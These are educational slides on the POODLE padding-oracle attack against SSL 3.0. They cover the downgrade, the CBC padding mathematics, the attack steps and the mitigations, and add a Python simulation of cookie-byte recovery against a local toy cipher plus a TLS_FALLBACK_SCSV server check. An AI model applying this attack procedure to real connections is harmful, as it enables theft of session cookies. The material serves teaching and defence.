POODLE
This POODLE Bites: Exploiting The SSL 3.0 Fallback
Bodo Möller, Thai Duong, Krzysztof Kotowicz
Presented By: Samit Anwer

Padding Oracle On Downgraded Legacy Encryption
• If an attacker interferes with a handshake offering TLS 1.0 or later, clients will downgrade to SSL 3.0
• Encryption in SSL 3.0 uses either the RC4 stream cipher or a block cipher (AES/DES) in CBC mode
• We will use AES in CBC mode of operation as the running example
• Assumption:
  • the attacker can modify network transmissions between the client and the server
Attack Scenario
• The attacker sends a link to the victim (http://evil.com)
• When the victim visits the link, the JavaScript embedded on evil.com starts making cookie-bearing requests to https://example.com
An HTTP request looks like:
POST /path Cookie: name=value...\r\n\r\n body
• The attacker can MITM the encrypted traffic and controls the data in “path” and “body”.
Cipher Block Chaining Encryption
POST /path Cookie: name=value...\r\n\r\nbody ‖ 20byte MAC ‖ padding
[Figure: CBC encryption diagram; plaintext blocks P1, P2, ..., Pi, ..., Pn-1, Pn are chained into ciphertext blocks C1, C2, ..., Ci, ..., Cn-1, Cn]
Ci = EK(Pi ⊕ Ci-1)
C0 = IV
AES block size is 16 bytes
DES block size is 8 bytes
Cipher Block Chaining Decryption
Pi = DK(Ci) ⊕ Ci-1
C0 = IV
[Figure: CBC decryption diagram; ciphertext blocks C1, C2, ..., Ci, ..., Cn-1, Cn are decrypted back into P1, P2, ..., Pi, ..., Pn-1, Pn]
POST /path Cookie: name=value...\r\n\r\nbody ‖ 20byte MAC ‖ padding
The attack
POST /path Cookie: sessionid=value...\r\n\r\nbody ‖ 20byte MAC ‖ padding
Padding of 1 to L bytes (where L is the block size in bytes) is added before performing blockwise CBC encryption.
The attacker controls the request path and the request body, and hence can forge requests such that:
1. The padding fills an entire block (encrypted into Cn).
2. The cookie’s first (as yet unknown) byte appears as the final byte of an earlier block (which gets encrypted into Ci).
• The attacker replaces Cn by any earlier ciphertext block Ci
• the ciphertext will be accepted if DK(Ci) ⊕ Cn-1 happens to have 15 (that is, L-1) as its final byte,
• otherwise it will be rejected, giving rise to a padding oracle attack
Attack Contd.
[Figure: the forged record with Cn replaced by Ci; the receiver decrypts DK(Cn/Ci) ⊕ Cn-1 as the final block. Known entities: the ciphertext blocks C1 ... Cn-1 and Ci; unknown entity: the plaintext byte Pi[15]]
From CBC decryption we know:
Pi = DK(Ci) ⊕ Ci-1
⇒ Pn = DK(Cn) ⊕ Cn-1
⇒ Pn[15] = DK(Cn)[15] ⊕ Cn-1[15] ----- (a)
Assuming L=16 (AES) and the ciphertext (with Cn replaced by Ci) gets accepted:
From (a): 15 = DK(Ci)[15] ⊕ Cn-1[15], which can be written as
=> DK(Ci)[15] = 15 ⊕ Cn-1[15] --------- (1)
We know: Pi = DK(Ci) ⊕ Ci-1
and hence Pi[15] = DK(Ci)[15] ⊕ Ci-1[15] --------- (2)
By replacing DK(Ci)[15] from (1) in (2) we get
Pi[15] = 15 ⊕ Cn-1[15] ⊕ Ci-1[15]
Cn-1[15] and Ci-1[15] are ciphertext bytes the attacker can see, so the unknown plaintext byte Pi[15] is recovered.
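The two slides above (the block swap and the Pi[15] derivation) simulated end to end, as an added example that is not from the slides or the paper: an SSL 3.0-style CBC record (data ‖ 20-byte MAC ‖ padding) whose receiver only trusts the final padding byte, and a local check that the swapped block is accepted about once in 256 requests and that 15 ⊕ Cn-1[15] ⊕ Ci-1[15] then equals the cookie byte. The toy block cipher, the request layout and the cookie value are constructed for the simulation; AES is not used so that the example runs without third-party packages, and nothing here touches a network.

```python
import hmac, hashlib, os, random

L = 16        # AES block size in bytes, as on the slides
MAC_LEN = 20  # the slides' 20-byte MAC (HMAC-SHA1 here)

def make_toy_cipher(key):
    """Keyed 16-byte permutation standing in for AES (a toy, NOT secure); the oracle
    below depends only on CBC chaining and the SSL 3.0 padding check, not the cipher."""
    sbox = list(range(256))
    random.Random(key).shuffle(sbox)
    inv = [sbox.index(v) for v in range(256)]
    def enc(block):
        x = list(block)
        for _ in range(2):                            # 2 rounds: key xor + S-box, chain, reverse
            x = [sbox[a ^ b] for a, b in zip(x, key)]
            for j in range(1, L):
                x[j] ^= x[j - 1]
            x = x[::-1]
        return bytes(x)
    def dec(block):
        x = list(block)
        for _ in range(2):
            x = x[::-1]
            for j in range(L - 1, 0, -1):
                x[j] ^= x[j - 1]
            x = [inv[a] ^ b for a, b in zip(x, key)]
        return bytes(x)
    return enc, dec

def ssl3_encrypt(enc, mac_key, data):
    """SSL 3.0 CBC record: data || MAC || padding, whose final byte is the pad length."""
    body = data + hmac.new(mac_key, data, hashlib.sha1).digest()
    pad_len = (L - 1 - len(body) % L) % L           # 15 when data+MAC already fill whole blocks
    body += os.urandom(pad_len) + bytes([pad_len])  # the padding bytes themselves are never checked
    prev = iv = os.urandom(L)
    out = b""
    for i in range(0, len(body), L):
        prev = enc(bytes(a ^ b for a, b in zip(body[i:i + L], prev)))  # Ci = EK(Pi xor Ci-1)
        out += prev
    return iv + out

def ssl3_accepts(dec, mac_key, record):
    """Receiver: CBC-decrypt, trust the last byte as pad length, strip, then check the MAC."""
    blocks = [record[i:i + L] for i in range(0, len(record), L)]  # blocks[0] is the IV (C0)
    plain = b"".join(bytes(a ^ b for a, b in zip(dec(c), p))       # Pi = DK(Ci) xor Ci-1
                     for p, c in zip(blocks, blocks[1:]))
    pad_len = plain[-1]
    if pad_len >= L:
        return False
    plain = plain[:-(pad_len + 1)]
    data, mac = plain[:-MAC_LEN], plain[-MAC_LEN:]
    return hmac.compare_digest(mac, hmac.new(mac_key, data, hashlib.sha1).digest())

def make_victim(cookie):
    """Browser and server sharing one session key; the browser appends the secret cookie."""
    enc, dec = make_toy_cipher(os.urandom(L))
    mac_key = os.urandom(L)
    send = lambda prefix, body: ssl3_encrypt(enc, mac_key, prefix + cookie + b"\r\n\r\n" + body)
    accepts = lambda record: ssl3_accepts(dec, mac_key, record)
    return send, accepts

def recover_first_cookie_byte(send, accepts, cookie_len, max_requests=100000):
    """Slides 6-7: choose path/body lengths so cookie[0] ends block Ci and the padding fills
    block Cn, then resend with Cn replaced by Ci until the receiver accepts."""
    head, tail = b"POST /", b" HTTP/1.0\r\nCookie: sessionid="
    prefix = head + b"A" * ((L - 1 - (len(head) + len(tail)) % L) % L) + tail  # cookie[0] at 16i-1
    i = (len(prefix) + 1) // L                                                 # 1-based index of Ci
    body = b"B" * ((-(len(prefix) + cookie_len + 4 + MAC_LEN)) % L)            # data+MAC fill blocks
    for attempt in range(1, max_requests + 1):
        rec = send(prefix, body)                      # fresh IV and padding on every request
        blocks = [rec[j:j + L] for j in range(0, len(rec), L)]
        if accepts(b"".join(blocks[:-1]) + blocks[i]):  # Cn := Ci, accepted ~1 time in 256
            return (L - 1) ^ blocks[-2][15] ^ blocks[i - 1][15], attempt  # 15 ^ Cn-1[15] ^ Ci-1[15]
    return None, max_requests
```

The attempt count returned by recover_first_cookie_byte is the page's "256 SSL 3.0 requests per byte" figure; the only signal the receiver leaks is accept versus reject.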
Overall Effort
• 256 SSL 3.0 requests per byte (on average)
Recommendation
• disable the SSL 3.0 protocol in the client, in the server, or both
• TLS_FALLBACK_SCSV
  • when an incoming connection includes 0x56, 0x00 (TLS_FALLBACK_SCSV) in ClientHello.cipher_suites, compare ClientHello.client_version to the highest protocol version supported by the server. If the server supports a version higher than the one indicated by the client, reject the connection
Problem with SSL 3.0 in CBC mode:
The integrity of the padding cannot be verified when decrypting, as it is not covered by the MAC; the receiver reads only the final byte (the padding length) and never checks the padding bytes themselves.
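The TLS_FALLBACK_SCSV server-side rule from the slide, as an added example that is not from the slides or any TLS library: a minimal ClientHello parser that pulls out client_version and cipher_suites, and the check that refuses a downgraded retry. The ClientHello bytes are constructed by build_client_hello for the demonstration; the alert name inappropriate_fallback (86) is the one RFC 7507 assigns to this rejection.

```python
import struct

TLS_FALLBACK_SCSV = 0x5600         # the {0x56, 0x00} value on the slide (RFC 7507)
INAPPROPRIATE_FALLBACK = 86        # the alert RFC 7507 defines for this rejection
VERSIONS = {(3, 0): "SSL 3.0", (3, 1): "TLS 1.0", (3, 2): "TLS 1.1", (3, 3): "TLS 1.2"}

def parse_client_hello(record):
    """Return (client_version, cipher_suites) from a raw TLS record carrying a ClientHello.
    Only the fields the fallback check needs are parsed; extensions are ignored."""
    if len(record) < 5 or record[0] != 0x16:
        raise ValueError("not a handshake record")
    rec_len = struct.unpack(">H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if len(hs) < 4 or hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    if len(body) < 2 + 32 + 1 + 2:
        raise ValueError("truncated ClientHello")
    client_version = (body[0], body[1])
    pos = 2 + 32                                   # skip client_random
    pos += 1 + body[pos]                           # skip session_id (1-byte length prefix)
    cs_len = struct.unpack(">H", body[pos:pos + 2])[0]
    pos += 2
    if cs_len % 2 or pos + cs_len > len(body):
        raise ValueError("bad cipher_suites vector")
    suites = [struct.unpack(">H", body[k:k + 2])[0] for k in range(pos, pos + cs_len, 2)]
    return client_version, suites

def fallback_check(record, server_max_version=(3, 3)):
    """The slide's rule: SCSV present and client_version below the server's highest version
    means a downgraded retry, so the server refuses. Returns (accept, reason)."""
    client_version, suites = parse_client_hello(record)
    if TLS_FALLBACK_SCSV in suites and client_version < server_max_version:
        return False, "inappropriate_fallback(%d): %s offered with TLS_FALLBACK_SCSV" % (
            INAPPROPRIATE_FALLBACK, VERSIONS.get(client_version, client_version))
    return True, "ok"

def build_client_hello(client_version, suites):
    """Constructed test input: a minimal ClientHello (zero random, no session id, no extensions)."""
    body = bytes(client_version) + bytes(32) + b"\x00"
    body += struct.pack(">H", 2 * len(suites)) + b"".join(struct.pack(">H", s) for s in suites)
    body += b"\x01\x00"                            # compression_methods: null only
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16" + bytes(client_version) + struct.pack(">H", len(hs)) + hs
```

A client that genuinely supports only SSL 3.0 never sends the SCSV, so it is still accepted by this rule; only a client that had to retry at a lower version after a failed higher-version handshake is turned away.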
Demo Overview
src: https://patzke.org/implementing-the-poodle-attack.html
Attack Steps:
• Downgrade the TLS protocol to SSLv3 by disrupting the TLS handshake attempts.
• Adjust the URL and POST body length such that the last block of the ciphertext is padding.
• Perform the copy operation (Cn replaced by Ci) on every generated TLS packet and calculate the leaked byte if the server accepts the modified packet.
References
• This POODLE Bites: Exploiting The SSL 3.0 Fallback, Bodo Möller, Thai Duong, Krzysztof Kotowicz, https://www.openssl.org/~bodo/ssl-poodle.pdf
• Attack of the week: POODLE, https://blog.cryptographyengineering.com/2014/10/15/attack-of-week-poodle/
• Implementing the POODLE Attack, https://patzke.org/implementing-the-poodle-attack.html

Editor's Notes

  1. An initialization vector (IV) or starting variable (SV) is a block of bits that is used by several modes to randomize the encryption and hence to produce distinct ciphertexts even if the same plaintext is encrypted multiple times, without the need for a slower re-keying process.
  2. Now observe that if there’s a full block of padding and an attacker replaces Cn by any earlier ciphertext block Ci from the same encrypted stream, the ciphertext will still be accepted if DK(Ci) ⊕ Cn-1 happens to have L-1 as its final byte, but will in all likelihood be rejected otherwise, giving rise to a padding oracle attack.